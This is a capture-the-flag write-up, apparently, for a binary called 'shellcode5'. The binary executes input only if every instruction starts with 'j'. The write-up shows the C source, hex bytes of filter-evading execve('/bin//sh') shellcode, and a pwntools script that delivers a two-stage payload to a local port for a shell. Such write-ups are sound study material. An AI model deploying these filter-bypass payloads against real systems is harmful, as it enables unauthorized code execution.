shellcode5

include <string.h>

include <stdio.h>

include <stdlib.h>

include <inttypes.h>

include <capstone/capstone.h>

include <sys/mman.h>

int upkeep() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
}
int validate(char* ptr, size_t len) {
csh handle;
cs_insn insn;
int ret = 1;
if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) {
return 0;
}
size_t count = cs_disasm(handle, ptr, len, 0, 0, &insn);
size_t success_len = 0;
if (count > 0) {
for (size_t j = 0; j < count; j++) {
ret &= insn[j].mnemonic[0] == 'j';
success_len += insn[j].size;
}
cs_free(insn, count);
} else {
return 0;
}
cs_close(&handle);
ret &= len == success_len;
return ret;
}
int main() {
upkeep();
char code[4096];
size_t n = read(0, code, 0x1000);
if (n > 0 && validate(code, n)) {
((void ()())code)();
}
return 0;
}

要满足shellcode都是j开头的指令

所以就是每一次先jmp下一条指令，然后短跳转开始我们的shellcode指令

EB 01 E9 48 31 FF 90
EB 01 E9 48 31 F6 90
EB 01 E9 48 31 D2 90
EB 01 E9 48 31 C0 90
EB 01 E9 48 31 DB 90
EB 01 E9 50 90 90 90
EB 01 E9 B3 68 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 73 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 6E 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 69 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 62 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 53 90 90 90
EB 01 E9 48 89 E7 90
EB 01 E9 B0 3B 90 90
EB 01 E9 0F 05 90 90

汇编是这样

from pwn import *
elf = ELF("shellcode5")
context.log_level = "debug"
context.binary = elf
skip = asm("""
jmp here+1
here:
""")
set_rdi_rsi = asm("""
push rdx
pop rsi
xor edi, edi
""")
set_rdx = asm("""
mov al, 255
mov edx, eax
""")
set_rax_syscall = asm("""
xor eax, eax
syscall
""")
# rax = 0, rdi = 0, rsi = ptr, rdx = len
p = remote("127.0.0.1", 37251)
# p = process()
# p = elf.debug()
first = skip + b"\xe9" + set_rdi_rsi + skip + b"\xe9" + set_rdx + skip +
b"\xe9" + set_rax_syscall
p.send(first)
pause()
p.send(b"A" * len(first) + asm(shellcraft.sh()))
p.interactive()